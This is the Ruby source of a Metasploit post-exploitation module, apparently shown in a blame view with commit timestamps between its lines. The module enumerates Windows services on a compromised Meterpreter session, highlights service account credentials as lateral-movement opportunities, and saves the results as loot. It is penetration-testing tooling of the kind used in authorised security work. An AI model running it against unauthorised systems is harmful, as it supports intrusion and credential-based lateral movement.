2011-07-30 15:11:52 +00:00
|
|
|
##
|
2014-10-17 16:47:33 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2013-10-15 18:50:46 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2011-07-30 15:11:52 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Post
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
include Msf::Post::Windows::Services
|
2011-07-30 15:11:52 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => "Windows Gather Service Info Enumeration",
|
|
|
|
'Description' => %q{
|
2014-02-19 00:24:23 +00:00
|
|
|
This module will query the system for services and display name and
|
|
|
|
configuration info for each returned service. It allows you to
|
|
|
|
optionally search the credentials, path, or start type for a string
|
|
|
|
and only return the results that match. These query operations are
|
|
|
|
cumulative and if no query strings are specified, it just returns all
|
|
|
|
services. NOTE: If the script hangs, windows firewall is most likely
|
|
|
|
on and you did not migrate to a safe process (explorer.exe for
|
|
|
|
example).
|
2013-08-30 21:28:54 +00:00
|
|
|
},
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Platform' => ['win'],
|
|
|
|
'SessionTypes' => ['meterpreter'],
|
|
|
|
'Author' => ['Keith Faber', 'Kx499']
|
|
|
|
))
|
|
|
|
register_options(
|
|
|
|
[
|
|
|
|
OptString.new('CRED', [ false, 'String to search credentials for' ]),
|
|
|
|
OptString.new('PATH', [ false, 'String to search path for' ]),
|
2014-07-04 19:37:09 +00:00
|
|
|
OptEnum.new('TYPE', [true, 'Service startup Option', 'All', ['All', 'Auto', 'Manual', 'Disabled' ]])
|
2013-08-30 21:28:54 +00:00
|
|
|
], self.class)
|
|
|
|
end
|
2011-07-30 15:11:52 +00:00
|
|
|
|
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
def run
|
2011-07-30 15:11:52 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
# set vars
|
2014-07-02 16:48:48 +00:00
|
|
|
credentialCount = {}
|
2013-08-30 21:28:54 +00:00
|
|
|
qcred = datastore["CRED"] || nil
|
|
|
|
qpath = datastore["PATH"] || nil
|
2014-07-04 19:37:09 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if datastore["TYPE"] == "All"
|
|
|
|
qtype = nil
|
|
|
|
else
|
2014-07-04 19:37:09 +00:00
|
|
|
qtype = datastore["TYPE"].downcase
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2014-02-19 00:24:23 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if qcred
|
2014-02-19 00:24:23 +00:00
|
|
|
qcred = qcred.downcase
|
2014-07-03 17:46:56 +00:00
|
|
|
print_status("Credential Filter: #{qcred}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2014-02-19 00:24:23 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if qpath
|
2014-02-19 00:24:23 +00:00
|
|
|
qpath = qpath.downcase
|
2014-07-03 17:46:56 +00:00
|
|
|
print_status("Executable Path Filter: #{qpath}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2014-02-19 00:24:23 +00:00
|
|
|
|
2013-08-30 21:28:54 +00:00
|
|
|
if qtype
|
2014-07-03 17:46:56 +00:00
|
|
|
print_status("Start Type Filter: #{qtype}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2011-11-06 22:02:26 +00:00
|
|
|
|
2013-12-15 03:00:29 +00:00
|
|
|
results_table = Rex::Ui::Text::Table.new(
|
|
|
|
'Header' => 'Services',
|
|
|
|
'Indent' => 1,
|
|
|
|
'SortIndex' => 0,
|
|
|
|
'Columns' => ['Name', 'Credentials', 'Command', 'Startup']
|
|
|
|
)
|
|
|
|
|
2014-07-04 19:46:50 +00:00
|
|
|
print_status("Listing Service Info for matching services, please wait...")
|
2013-12-15 03:00:29 +00:00
|
|
|
service_list.each do |srv|
|
2013-08-30 21:28:54 +00:00
|
|
|
srv_conf = {}
|
2013-12-15 03:00:29 +00:00
|
|
|
|
2014-02-19 00:24:23 +00:00
|
|
|
# make sure we got a service name
|
2013-12-15 03:00:29 +00:00
|
|
|
if srv[:name]
|
2013-08-30 21:28:54 +00:00
|
|
|
begin
|
2013-12-15 03:00:29 +00:00
|
|
|
srv_conf = service_info(srv[:name])
|
2013-12-18 11:15:52 +00:00
|
|
|
if srv_conf[:startname]
|
2014-02-19 00:24:23 +00:00
|
|
|
# filter service based on filters passed, the are cumulative
|
|
|
|
if qcred && !srv_conf[:startname].downcase.include?(qcred)
|
2013-12-18 11:15:52 +00:00
|
|
|
next
|
|
|
|
end
|
|
|
|
|
2014-02-19 00:24:23 +00:00
|
|
|
if qpath && !srv_conf[:path].downcase.include?(qpath)
|
2013-12-18 11:15:52 +00:00
|
|
|
next
|
|
|
|
end
|
|
|
|
|
|
|
|
# There may not be a 'Startup', need to check nil
|
2014-02-19 00:24:23 +00:00
|
|
|
if qtype && !(START_TYPE[srv_conf[:starttype]] || '').downcase.include?(qtype)
|
2013-12-18 11:15:52 +00:00
|
|
|
next
|
|
|
|
end
|
|
|
|
|
2014-07-04 19:37:09 +00:00
|
|
|
# count the occurance of specific credentials services are running as
|
2014-07-04 19:46:50 +00:00
|
|
|
serviceCred = srv_conf[:startname].upcase
|
2014-07-04 19:37:09 +00:00
|
|
|
unless serviceCred.empty?
|
|
|
|
if credentialCount.has_key?(serviceCred)
|
|
|
|
credentialCount[serviceCred] += 1
|
|
|
|
else
|
|
|
|
credentialCount[serviceCred] = 1
|
|
|
|
# let the user know a new service account has been detected for possible lateral
|
|
|
|
# movement opportunities
|
2014-07-04 19:46:50 +00:00
|
|
|
print_good("New service credential detected: #{srv[:name]} is running as '#{srv_conf[:startname]}'")
|
2014-07-04 19:37:09 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
|
2013-12-18 11:15:52 +00:00
|
|
|
results_table << [srv[:name],
|
|
|
|
srv_conf[:startname],
|
|
|
|
START_TYPE[srv_conf[:starttype]],
|
|
|
|
srv_conf[:path]]
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2013-12-15 03:00:29 +00:00
|
|
|
|
2013-12-15 18:43:55 +00:00
|
|
|
rescue RuntimeError => e
|
2014-02-19 00:24:23 +00:00
|
|
|
print_error("An error occurred enumerating service: #{srv[:name]}: #{e}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
else
|
2014-07-04 19:46:50 +00:00
|
|
|
print_error("Problem enumerating service - no service name found")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
|
|
|
end
|
2013-12-15 03:00:29 +00:00
|
|
|
|
|
|
|
print_line results_table.to_s
|
2014-07-04 19:37:09 +00:00
|
|
|
|
|
|
|
# store loot on completion of collection
|
|
|
|
p = store_loot("windows.services", "text/plain", session, results_table.to_s, "windows_services.txt", "Windows Services")
|
|
|
|
print_good("Loot file stored in: #{p.to_s}")
|
2013-08-30 21:28:54 +00:00
|
|
|
end
|
2011-07-30 15:11:52 +00:00
|
|
|
|
|
|
|
end
|